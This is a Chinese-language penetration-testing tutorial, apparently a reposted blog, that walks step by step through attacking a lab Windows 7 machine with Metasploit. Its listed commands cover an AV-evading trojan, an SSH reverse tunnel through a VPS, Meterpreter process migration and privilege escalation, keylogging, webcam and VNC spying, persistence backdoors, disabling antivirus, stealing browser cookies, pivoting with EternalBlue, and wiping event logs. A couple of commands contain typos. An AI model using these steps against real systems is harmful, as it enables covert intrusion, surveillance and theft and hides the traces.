0x00. Metasploit Framework简介
Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!
0x01. 实战操作
环境准备:
1. 靶机win 7 IP=192.168.43.150
2. kali linux IP=192.168.43.153
3. VPS服务器 IP=xx.xx.xx.xx
实战演示:
1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)
vi /etc/ssh/sshd_config && GatewayPorts:yes
ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 [email protected] -p 29402
2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章
[*]如果想要在docker启动持续监听可以用如下命令
set exitonsession false && run -j
3. 在win 7 中执行木马
4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程
migrate 1988 && getpid
5. 查看当前权限、系统信息,并尝试提权
getuid && sysinfo && getsystem
6. 查看网络、路由信息
ifconfig && route
7. 监视靶机的桌面
run vnc
8. 启动键盘监听
keyscan_start && keyscan_dump
9. 设置后门,维持权限
run persistence -U -i 10 -p 2333 192.168.43.153
run persistence -X -i 10 -p 2333 192.168.43.153
10. 截屏查看靶机当前桌面
screenshot
11. 查看当前系统空闲时间
idletime
12. 禁用靶机使用键盘鼠标(笔者win 7系统是64位的,不支持这个操作)
uictl disable keyboard
uictl disable mouse
13. 查找靶机中重要的敏感文件
search -d c:\\ -f payload.exe
14. 指定下载靶机中的文件到本地
dowmload c:\\Users\\root\\Desktop\\payload.exe /root/Desktop
15. 上传指定本地文件到靶机中
upload /root/Desktop/hack.jpeg c:\\Users\\root\\Desktop\\payload.exe
16. 打开靶机摄像头,win 7虚拟机没有摄像头所以没反应
webcam_snap
1. 调用post模块查看当前系统可用的提权模块
run post/multi/recon/local_exploit_suggester
2. 调用payload模块对靶机进行远程桌面操作
set payload windows/vncinject/reverse_tcp
set viewonly no
3. 关掉靶机中的杀软
killav
4. 收集靶机浏览器的敏感信息(访问记录、cookie)
run post/windows/gather/enum_ie
5. 设置路由转发,扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)
route add 92.168.43.150 255.255.255.0 3
use auxiliary/scanner/portscan/tcp
6. 扫描一波内网有没有ms17_010漏洞的主机
use auxiliary/scanner/smb/smb_ms17_010
7. 笔者扫到win 7就有这个漏洞,然后就愉快的调用exp搞一波
use exploit/windows/smb/ms17_010_eternalblue
8. 功成身退
clearev
0x03. 结语
msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!
如有侵权请联系:admin#unsafe.sh